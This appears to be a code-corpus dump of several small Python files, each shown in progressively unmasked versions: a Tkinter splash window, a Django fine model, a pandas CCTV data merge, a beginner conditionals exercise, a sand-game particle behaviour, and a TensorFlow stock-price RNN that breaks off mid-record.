window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\nroot = Tk()\nroot.title('3 Second Splash')\nroot.geometry('250x250')\nb = Button(root, text='Launch splash window', command=create_window)\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n", "step-5": "from Tkinter import *\nimport time\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window,width=w,height=h)\n canvas.create_text(w/2,h/2,text=\"this will close after 3 seconds\",font=\"Arial\")\n canvas.pack()\n window.overrideredirect(1)\n window.geometry(\"%dx%d+0+0\" % (w, h))\n window.after(3000, lambda: window.destroy())\n \nroot = Tk()\nroot.title(\"3 Second Splash\")\nroot.geometry(\"250x250\")\nb = Button(root, text=\"Launch splash window\", command=create_window)\nb.place(relx=0.5,rely=0.5,anchor=CENTER)\n#b.pack()\n\nroot.mainloop()\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from django.contrib.auth.decorators import permission_required from django.db import models from students.models import Student # Create your models here. class Fine(models.Model): amount = models.DecimalField(max_digits=8, decimal_places=2, null=True, default=0) student = models.OneToOneField(Student, on_delete=models.DO_NOTHING) timestamp = models.DateField(auto_now_add=True) updated_at = models.DateField(auto_now=True) class Meta: db_table = 'fines' verbose_name_plural = 'Fines' verbose_name = 'Fine' def __str__(self): return str(self.amount)
normal
{ "blob_id": "22b697790516e1160ac501a58ad93ef5b579414a", "index": 7109, "step-1": "<mask token>\n\n\nclass Fine(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Fine(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n\n def __str__(self):\n return str(self.amount)\n", "step-3": "<mask token>\n\n\nclass Fine(models.Model):\n amount = models.DecimalField(max_digits=8, decimal_places=2, null=True,\n default=0)\n student = models.OneToOneField(Student, on_delete=models.DO_NOTHING)\n timestamp = models.DateField(auto_now_add=True)\n updated_at = models.DateField(auto_now=True)\n\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n\n def __str__(self):\n return str(self.amount)\n", "step-4": "from django.contrib.auth.decorators import permission_required\nfrom django.db import models\nfrom students.models import Student\n\n\nclass Fine(models.Model):\n amount = models.DecimalField(max_digits=8, decimal_places=2, null=True,\n default=0)\n student = models.OneToOneField(Student, on_delete=models.DO_NOTHING)\n timestamp = models.DateField(auto_now_add=True)\n updated_at = models.DateField(auto_now=True)\n\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n\n def __str__(self):\n return str(self.amount)\n", "step-5": "from django.contrib.auth.decorators import permission_required\nfrom django.db import models\nfrom students.models import Student\n\n\n# Create your models here.\n\nclass Fine(models.Model):\n amount = models.DecimalField(max_digits=8, decimal_places=2, null=True, default=0)\n student = models.OneToOneField(Student, on_delete=models.DO_NOTHING)\n timestamp = 
models.DateField(auto_now_add=True)\n updated_at = models.DateField(auto_now=True)\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n\n def __str__(self):\n return str(self.amount)\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
import pandas as pd # 데이터 로드 train_data = pd.read_csv('./dataset/train_park_daycare.csv') cctv = pd.read_csv("./dataset/cctv_origin.csv", encoding="EUC-KR") ## 데이터 전처리 # 데이터 추출 cctv = cctv.iloc[1:, :2] # 구 매핑 gu_dict_num = {'용산구': 0, '양천구': 1, '강동구': 2, '관악구': 3, '노원구': 4, '영등포': 5, '영등포구': 5, '마포구': 6, '서초구': 7, '성동구': 8, '금천구': 9, '도봉구': 10, '동작구': 11, '강서구': 12, '동대문': 13, '동대문구': 13, '강북구': 14, '서대문': 15, '서대문구': 15, '광진구': 16, '구로구': 17, '성북구': 18, '강남구': 19, '종로구': 20, '중구': 21, '중랑구': 22, '송파구': 23, '은평구': 24} gu_list = [] for i in cctv['구분']: gu_list.append(gu_dict_num[i]) cctv['gu'] = gu_list cctv.drop(['구분'], axis=1, inplace=True) # 컬럼 이름 변경 cctv = cctv.rename(columns={'총계': 'cctv_num'}) # 데이터 타입 변경 cctv['cctv_num'] = cctv['cctv_num'].apply(lambda x: "".join(x.split(','))) cctv['cctv_num'] = pd.to_numeric(cctv['cctv_num']) # 조인 new_data = pd.merge(train_data, cctv, on='gu', how='left') print(new_data.info()) # 저장 new_data.to_csv("./dataset/train_add_cctv.csv", header=True, index=False)
normal
{ "blob_id": "ea2e9399a8384600d8457a9de3f263db44dc883d", "index": 752, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in cctv['구분']:\n gu_list.append(gu_dict_num[i])\n<mask token>\ncctv.drop(['구분'], axis=1, inplace=True)\n<mask token>\nprint(new_data.info())\nnew_data.to_csv('./dataset/train_add_cctv.csv', header=True, index=False)\n", "step-3": "<mask token>\ntrain_data = pd.read_csv('./dataset/train_park_daycare.csv')\ncctv = pd.read_csv('./dataset/cctv_origin.csv', encoding='EUC-KR')\ncctv = cctv.iloc[1:, :2]\ngu_dict_num = {'용산구': 0, '양천구': 1, '강동구': 2, '관악구': 3, '노원구': 4, '영등포': 5,\n '영등포구': 5, '마포구': 6, '서초구': 7, '성동구': 8, '금천구': 9, '도봉구': 10, '동작구': 11,\n '강서구': 12, '동대문': 13, '동대문구': 13, '강북구': 14, '서대문': 15, '서대문구': 15,\n '광진구': 16, '구로구': 17, '성북구': 18, '강남구': 19, '종로구': 20, '중구': 21, '중랑구':\n 22, '송파구': 23, '은평구': 24}\ngu_list = []\nfor i in cctv['구분']:\n gu_list.append(gu_dict_num[i])\ncctv['gu'] = gu_list\ncctv.drop(['구분'], axis=1, inplace=True)\ncctv = cctv.rename(columns={'총계': 'cctv_num'})\ncctv['cctv_num'] = cctv['cctv_num'].apply(lambda x: ''.join(x.split(',')))\ncctv['cctv_num'] = pd.to_numeric(cctv['cctv_num'])\nnew_data = pd.merge(train_data, cctv, on='gu', how='left')\nprint(new_data.info())\nnew_data.to_csv('./dataset/train_add_cctv.csv', header=True, index=False)\n", "step-4": "import pandas as pd\ntrain_data = pd.read_csv('./dataset/train_park_daycare.csv')\ncctv = pd.read_csv('./dataset/cctv_origin.csv', encoding='EUC-KR')\ncctv = cctv.iloc[1:, :2]\ngu_dict_num = {'용산구': 0, '양천구': 1, '강동구': 2, '관악구': 3, '노원구': 4, '영등포': 5,\n '영등포구': 5, '마포구': 6, '서초구': 7, '성동구': 8, '금천구': 9, '도봉구': 10, '동작구': 11,\n '강서구': 12, '동대문': 13, '동대문구': 13, '강북구': 14, '서대문': 15, '서대문구': 15,\n '광진구': 16, '구로구': 17, '성북구': 18, '강남구': 19, '종로구': 20, '중구': 21, '중랑구':\n 22, '송파구': 23, '은평구': 24}\ngu_list = []\nfor i in cctv['구분']:\n gu_list.append(gu_dict_num[i])\ncctv['gu'] = gu_list\ncctv.drop(['구분'], axis=1, inplace=True)\ncctv = 
cctv.rename(columns={'총계': 'cctv_num'})\ncctv['cctv_num'] = cctv['cctv_num'].apply(lambda x: ''.join(x.split(',')))\ncctv['cctv_num'] = pd.to_numeric(cctv['cctv_num'])\nnew_data = pd.merge(train_data, cctv, on='gu', how='left')\nprint(new_data.info())\nnew_data.to_csv('./dataset/train_add_cctv.csv', header=True, index=False)\n", "step-5": "import pandas as pd\n\n# 데이터 로드\ntrain_data = pd.read_csv('./dataset/train_park_daycare.csv')\ncctv = pd.read_csv(\"./dataset/cctv_origin.csv\", encoding=\"EUC-KR\")\n\n## 데이터 전처리\n# 데이터 추출\ncctv = cctv.iloc[1:, :2]\n\n# 구 매핑\ngu_dict_num = {'용산구': 0, '양천구': 1, '강동구': 2, '관악구': 3, '노원구': 4, '영등포': 5, '영등포구': 5, '마포구': 6, '서초구': 7, '성동구': 8, '금천구': 9, '도봉구': 10, '동작구': 11, '강서구': 12, '동대문': 13, '동대문구': 13, '강북구': 14, '서대문': 15, '서대문구': 15, '광진구': 16, '구로구': 17, '성북구': 18, '강남구': 19, '종로구': 20, '중구': 21, '중랑구': 22, '송파구': 23, '은평구': 24}\ngu_list = []\nfor i in cctv['구분']:\n gu_list.append(gu_dict_num[i])\ncctv['gu'] = gu_list\ncctv.drop(['구분'], axis=1, inplace=True)\n\n# 컬럼 이름 변경\ncctv = cctv.rename(columns={'총계': 'cctv_num'})\n\n# 데이터 타입 변경\ncctv['cctv_num'] = cctv['cctv_num'].apply(lambda x: \"\".join(x.split(',')))\ncctv['cctv_num'] = pd.to_numeric(cctv['cctv_num'])\n\n# 조인\nnew_data = pd.merge(train_data, cctv, on='gu', how='left')\n\nprint(new_data.info())\n# 저장\nnew_data.to_csv(\"./dataset/train_add_cctv.csv\", header=True, index=False)\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
alien_color = 'green' if alien_color == 'green': print('you earned 5 points') alien_color2 = 'yellow' if alien_color2 == 'green': print ('your earned 5 points') if alien_color2 == 'yellow': print('Right answer') # 5.4 alien_color = 'green' if alien_color == 'green': print('you earned 5 points') else: print('your earned 10 points') # 5.5 alien_color = 'green' if alien_color == 'green': print('you earned 5 points') elif alien_color == 'yellow': return ('your earned 10 points') else: print('your earned 15 points')
normal
{ "blob_id": "30e4c4c5ef944b0cd2d36b2fe5f7eee39dff1d16", "index": 6511, "step-1": "<mask token>\n", "step-2": "<mask token>\nif alien_color == 'green':\n print('you earned 5 points')\n<mask token>\nif alien_color2 == 'green':\n print('your earned 5 points')\nif alien_color2 == 'yellow':\n print('Right answer')\n<mask token>\nif alien_color == 'green':\n print('you earned 5 points')\nelse:\n print('your earned 10 points')\n<mask token>\nif alien_color == 'green':\n print('you earned 5 points')\nelif alien_color == 'yellow':\n return 'your earned 10 points'\nelse:\n print('your earned 15 points')\n", "step-3": "alien_color = 'green'\nif alien_color == 'green':\n print('you earned 5 points')\nalien_color2 = 'yellow'\nif alien_color2 == 'green':\n print('your earned 5 points')\nif alien_color2 == 'yellow':\n print('Right answer')\nalien_color = 'green'\nif alien_color == 'green':\n print('you earned 5 points')\nelse:\n print('your earned 10 points')\nalien_color = 'green'\nif alien_color == 'green':\n print('you earned 5 points')\nelif alien_color == 'yellow':\n return 'your earned 10 points'\nelse:\n print('your earned 15 points')\n", "step-4": "alien_color = 'green'\r\nif alien_color == 'green':\r\n print('you earned 5 points')\r\n\r\nalien_color2 = 'yellow'\r\nif alien_color2 == 'green':\r\n print ('your earned 5 points')\r\nif alien_color2 == 'yellow':\r\n print('Right answer')\r\n\r\n# 5.4\r\nalien_color = 'green'\r\nif alien_color == 'green':\r\n print('you earned 5 points')\r\nelse:\r\n print('your earned 10 points')\r\n\r\n\r\n# 5.5\r\nalien_color = 'green'\r\nif alien_color == 'green':\r\n print('you earned 5 points')\r\nelif alien_color == 'yellow':\r\n return ('your earned 10 points')\r\nelse:\r\n print('your earned 15 points')\r\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> class EphemeralBehaviour(Behaviour): <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class EphemeralBehaviour(Behaviour): <|reserved_special_token_0|> def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]: env.set(loc[0], loc[1], None) <|reserved_special_token_1|> <|reserved_special_token_0|> class EphemeralBehaviour(Behaviour): """Removes the particle after one frame """ def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]: env.set(loc[0], loc[1], None) <|reserved_special_token_1|> from sand_game.Environment import Environment from sand_game.behaviours.Behaviour import Behaviour class EphemeralBehaviour(Behaviour): """Removes the particle after one frame """ def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]: env.set(loc[0], loc[1], None)
flexible
{ "blob_id": "2728c3ab26fbdbaac9c47054eafe1c114341f6f2", "index": 7736, "step-1": "<mask token>\n\n\nclass EphemeralBehaviour(Behaviour):\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass EphemeralBehaviour(Behaviour):\n <mask token>\n\n def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]:\n env.set(loc[0], loc[1], None)\n", "step-3": "<mask token>\n\n\nclass EphemeralBehaviour(Behaviour):\n \"\"\"Removes the particle after one frame\n \"\"\"\n\n def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]:\n env.set(loc[0], loc[1], None)\n", "step-4": "from sand_game.Environment import Environment\nfrom sand_game.behaviours.Behaviour import Behaviour\n\n\nclass EphemeralBehaviour(Behaviour):\n \"\"\"Removes the particle after one frame\n \"\"\"\n\n def behave(env: Environment, loc: tuple[int, int]) ->tuple[int, int]:\n env.set(loc[0], loc[1], None)\n", "step-5": null, "step-ids": [ 1, 2, 3, 4 ] }
[ 1, 2, 3, 4 ]
import numpy as np import pandas as pd import sklearn import sklearn.preprocessing import matplotlib.pyplot as plt import tensorflow as tf from enum import Enum from pytalib.indicators import trend from pytalib.indicators import base class Cell(Enum): BasicRNN = 1 BasicLSTM = 2 LSTMCellPeephole = 3 GRU = 4 valid_set_size_percentage = 10 test_set_size_percentage = 10 df = pd.read_csv('data_2019-01-06.csv') df.sort_values('Date') # function for min-max normalization of stock def normalize_data(df): min_max_scaler = sklearn.preprocessing.MinMaxScaler() df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1)) df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1)) df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1)) df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-1, 1)) df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape(-1, 1)) return df # function to create train, validation, test data given stock data and sequence length def load_data(stock, seq_len): data_raw = stock.values # convert to numpy array data = [] # create all possible sequences of length seq_len for index in range(len(data_raw) - seq_len): data.append(data_raw[index: index + seq_len]) data = np.array(data) valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.shape[0])) test_set_size = int(np.round(test_set_size_percentage / 100 * data.shape[0])) train_set_size = data.shape[0] - (valid_set_size + test_set_size) x_train = data[:train_set_size, :-1, :] y_train = data[:train_set_size, -1, :] x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :] y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :] x_test = data[train_set_size + valid_set_size:, :-1, :] y_test = data[train_set_size + valid_set_size:, -1, :] return [x_train, y_train, x_valid, y_valid, x_test, y_test] # show predictions: 0 = open, 1 = close, 2 = highest, 3 = lowest, 4 = volume def 
show_predictions(ft, y_test_pred): plt.figure(figsize=(15, 5)) plt.subplot(1, 1, 1) plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black', label='test target') plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color='green', label='test prediction') plt.title('future stock prices') plt.xlabel('time [days]') plt.ylabel('normalized price') plt.legend(loc='best') x = 0 error_percent = 5 for index in range(0, len(y_test)): if (abs((y_test_pred[:, ft][index] - y_test[:, ft][index])) / abs(y_test[:, ft][index]) * 100) < error_percent: x += 1 print("Percent of predictions which error is less then {}% = {}%".format(error_percent, x / len(y_test) * 100)) # Calculating the direction between 2 points using true values and predicted values z = 0 distance = 10 for index in range(distance, len(y_test)): if (y_test[:, ft][index - distance] <= y_test[:, ft][index] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft] [index]) or ( y_test[:, ft][index - distance] >= y_test[:, ft][index] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][index]): z += 1 print("Percent of correct predicted direction = {}%".format(z / len(y_test) * 100)) plt.show() # choose one stock df_stock = df.copy() df_stock.drop(['Date'], 1, inplace=True) cols = list(df_stock.columns.values) # normalize stock df_stock_norm = df_stock.copy() df_stock_norm = normalize_data(df_stock_norm) # create train, test data seq_len = 50 # choose sequence length x_train, y_train, x_valid, y_valid, x_test, y_test = load_data(df_stock_norm, seq_len) index_in_epoch = 0 perm_array = np.arange(x_train.shape[0]) np.random.shuffle(perm_array) # function to get the next batch def get_next_batch(batch_size): global index_in_epoch, x_train, perm_array start = index_in_epoch index_in_epoch += batch_size if index_in_epoch > x_train.shape[0]: np.random.shuffle(perm_array) # shuffle permutation array start = 0 # start next epoch index_in_epoch = batch_size end = index_in_epoch return 
x_train[perm_array[start:end]], y_train[perm_array[start:end]] # parameters CellType = Cell.BasicRNN n_steps = seq_len - 1 n_inputs = 5 n_neurons = 200 n_outputs = 5 n_layers = 2 learning_rate = 0.001 batch_size = 50 n_epochs = 10 train_set_size = x_train.shape[0] test_set_size = x_test.shape[0] tf.reset_default_graph() X = tf.placeholder(tf.float32, [None, n_steps, n_inputs]) y = tf.placeholder(tf.float32, [None, n_outputs]) if CellType == Cell.BasicRNN: layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=tf.nn.elu) for layer in range(n_layers)] elif CellType == Cell.BasicLSTM: layers = [tf.contrib.rnn.BasicLSTMCell(num_units=n_neurons, activation=tf.nn.elu) for layer in range(n_layers)] elif CellType == Cell.LSTMCellPeephole: layers = [tf.contrib.rnn.LSTMCell(num_units=n_neurons, activation=tf.nn.leaky_relu, use_peepholes=True) for layer in range(n_layers)] elif CellType == Cell.GRU: layers = [tf.contrib.rnn.GRUCell(num_units=n_neurons, activation=tf.nn.leaky_relu) for layer in range(n_layers)] multi_layer_cell = tf.contrib.rnn.MultiRNNCell(layers) rnn_outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32) stacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons]) stacked_outputs = tf.layers.dense(stacked_rnn_outputs, n_outputs) outputs = tf.reshape(stacked_outputs, [-1, n_steps, n_outputs]) outputs = outputs[:, n_steps - 1, :] # keep only last output of sequence loss = tf.reduce_mean(tf.square(outputs - y)) # loss function = mean squared error optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) training_op = optimizer.minimize(loss) # run graph def train_data(model_name): with tf.Session() as sess: sess.run(tf.global_variables_initializer()) saver = tf.train.Saver() for iteration in range(int(n_epochs * train_set_size / batch_size)): x_batch, y_batch = get_next_batch(batch_size) # fetch the next training batch sess.run(training_op, feed_dict={X: x_batch, y: y_batch}) if iteration % int(5 * train_set_size / 
batch_size) == 0: mse_train = loss.eval(feed_dict={X: x_train, y: y_train}) mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid}) print('%.2f epochs: MSE train/valid = %.6f/%.6f' % ( iteration * batch_size / train_set_size, mse_train, mse_valid)) saver.save(sess, 'train_models/' + model_name) def test(model_name): saver = tf.train.Saver() with tf.Session() as sess: saver.restore(sess, 'train_models/' + model_name) y_test_pred = sess.run(outputs, feed_dict={X: x_test}) show_predictions(1, y_test_pred) model = ['train_model', 'train_model_LSTM', 'train_model_with_batch_500', 'train_model_with_layers_4', 'train_model_with_volume', 'model_seq_len_100', "model_GRU", 'model_LSTM_pipehole'] # train_data(model[0]) # test(model[0]) y_new = [] for i in y_test: y_new.append(i[1] * 10000) macd = trend.MovingAverageConvergenceDivergence(y_new) print(macd.calculate()) macd.validate() tt = trend.ExponentialMovingAverage(y_new, 10) print(tt.calculate()) plt.figure(figsize=(15, 5)) plt.subplot(1, 1, 1) plt.plot(np.arange(len(y_new)), y_new, color='black', label='test target') plt.plot(np.arange(len(macd.macd)), tt.calculate(), color='green', label='test prediction') plt.plot(np.arange(len(macd.macd)), macd.macd_signal_line, color='red', label='test prediction') plt.show()
normal
{ "blob_id": "4379d89c2ada89822acbf523d2e364599f996f8c", "index": 5456, "step-1": "<mask token>\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\n<mask token>\n\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-\n 1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape\n (-1, 1))\n return df\n\n\ndef load_data(stock, seq_len):\n data_raw = stock.values\n data = []\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index:index + seq_len])\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.\n shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.\n shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black',\n label='test target')\n plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color=\n 'green', label='test prediction')\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n x = 0\n error_percent = 5\n for index in range(0, 
len(y_test)):\n if abs(y_test_pred[:, ft][index] - y_test[:, ft][index]) / abs(y_test\n [:, ft][index]) * 100 < error_percent:\n x += 1\n print('Percent of predictions which error is less then {}% = {}%'.\n format(error_percent, x / len(y_test) * 100))\n z = 0\n distance = 10\n for index in range(distance, len(y_test)):\n if y_test[:, ft][index - distance] <= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft][\n index] or y_test[:, ft][index - distance] >= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][\n index]:\n z += 1\n print('Percent of correct predicted direction = {}%'.format(z / len(\n y_test) * 100))\n plt.show()\n\n\n<mask token>\n\n\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array)\n start = 0\n index_in_epoch = batch_size\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\n<mask token>\n\n\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size)\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train,\n mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\n<mask token>\n\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n 
df['Open'] = min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-\n 1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape\n (-1, 1))\n return df\n\n\ndef load_data(stock, seq_len):\n data_raw = stock.values\n data = []\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index:index + seq_len])\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.\n shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.\n shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black',\n label='test target')\n plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color=\n 'green', label='test prediction')\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if abs(y_test_pred[:, ft][index] - y_test[:, ft][index]) / abs(y_test\n [:, ft][index]) * 100 < error_percent:\n x += 1\n print('Percent of predictions which error is less then {}% = {}%'.\n format(error_percent, x / len(y_test) * 100))\n z = 0\n distance = 10\n for 
index in range(distance, len(y_test)):\n if y_test[:, ft][index - distance] <= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] <= y_test_pred[:, ft][\n index] or y_test[:, ft][index - distance] >= y_test[:, ft][index\n ] and y_test_pred[:, ft][index - distance] >= y_test_pred[:, ft][\n index]:\n z += 1\n print('Percent of correct predicted direction = {}%'.format(z / len(\n y_test) * 100))\n plt.show()\n\n\n<mask token>\n\n\ndef get_next_batch(batch_size):\n global index_in_epoch, x_train, perm_array\n start = index_in_epoch\n index_in_epoch += batch_size\n if index_in_epoch > x_train.shape[0]:\n np.random.shuffle(perm_array)\n start = 0\n index_in_epoch = batch_size\n end = index_in_epoch\n return x_train[perm_array[start:end]], y_train[perm_array[start:end]]\n\n\n<mask token>\n\n\ndef train_data(model_name):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n for iteration in range(int(n_epochs * train_set_size / batch_size)):\n x_batch, y_batch = get_next_batch(batch_size)\n sess.run(training_op, feed_dict={X: x_batch, y: y_batch})\n if iteration % int(5 * train_set_size / batch_size) == 0:\n mse_train = loss.eval(feed_dict={X: x_train, y: y_train})\n mse_valid = loss.eval(feed_dict={X: x_valid, y: y_valid})\n print('%.2f epochs: MSE train/valid = %.6f/%.6f' % (\n iteration * batch_size / train_set_size, mse_train,\n mse_valid))\n saver.save(sess, 'train_models/' + model_name)\n\n\ndef test(model_name):\n saver = tf.train.Saver()\n with tf.Session() as sess:\n saver.restore(sess, 'train_models/' + model_name)\n y_test_pred = sess.run(outputs, feed_dict={X: x_test})\n show_predictions(1, y_test_pred)\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass Cell(Enum):\n BasicRNN = 1\n BasicLSTM = 2\n LSTMCellPeephole = 3\n GRU = 4\n\n\n<mask token>\ndf.sort_values('Date')\n\n\ndef normalize_data(df):\n min_max_scaler = sklearn.preprocessing.MinMaxScaler()\n df['Open'] = 
min_max_scaler.fit_transform(df['Open'].values.reshape(-1, 1))\n df['High'] = min_max_scaler.fit_transform(df['High'].values.reshape(-1, 1))\n df['Low'] = min_max_scaler.fit_transform(df['Low'].values.reshape(-1, 1))\n df['Close'] = min_max_scaler.fit_transform(df['Close'].values.reshape(-\n 1, 1))\n df['Volume'] = min_max_scaler.fit_transform(df['Volume'].values.reshape\n (-1, 1))\n return df\n\n\ndef load_data(stock, seq_len):\n data_raw = stock.values\n data = []\n for index in range(len(data_raw) - seq_len):\n data.append(data_raw[index:index + seq_len])\n data = np.array(data)\n valid_set_size = int(np.round(valid_set_size_percentage / 100 * data.\n shape[0]))\n test_set_size = int(np.round(test_set_size_percentage / 100 * data.\n shape[0]))\n train_set_size = data.shape[0] - (valid_set_size + test_set_size)\n x_train = data[:train_set_size, :-1, :]\n y_train = data[:train_set_size, -1, :]\n x_valid = data[train_set_size:train_set_size + valid_set_size, :-1, :]\n y_valid = data[train_set_size:train_set_size + valid_set_size, -1, :]\n x_test = data[train_set_size + valid_set_size:, :-1, :]\n y_test = data[train_set_size + valid_set_size:, -1, :]\n return [x_train, y_train, x_valid, y_valid, x_test, y_test]\n\n\ndef show_predictions(ft, y_test_pred):\n plt.figure(figsize=(15, 5))\n plt.subplot(1, 1, 1)\n plt.plot(np.arange(y_test.shape[0]), y_test[:, ft], color='black',\n label='test target')\n plt.plot(np.arange(y_test_pred.shape[0]), y_test_pred[:, ft], color=\n 'green', label='test prediction')\n plt.title('future stock prices')\n plt.xlabel('time [days]')\n plt.ylabel('normalized price')\n plt.legend(loc='best')\n x = 0\n error_percent = 5\n for index in range(0, len(y_test)):\n if abs(y_test_pred[:, ft][index] - y_test[:, ft][index]) / abs(y_test\n [:, ft][index]) * 100 < error_percent:\n x += 1\n print('Percent of predictions which error is less then {}% = {}%'.\n format(error_percent, x / len(y_test) * 100))\n z = 0\n distance = 10\n for index in 
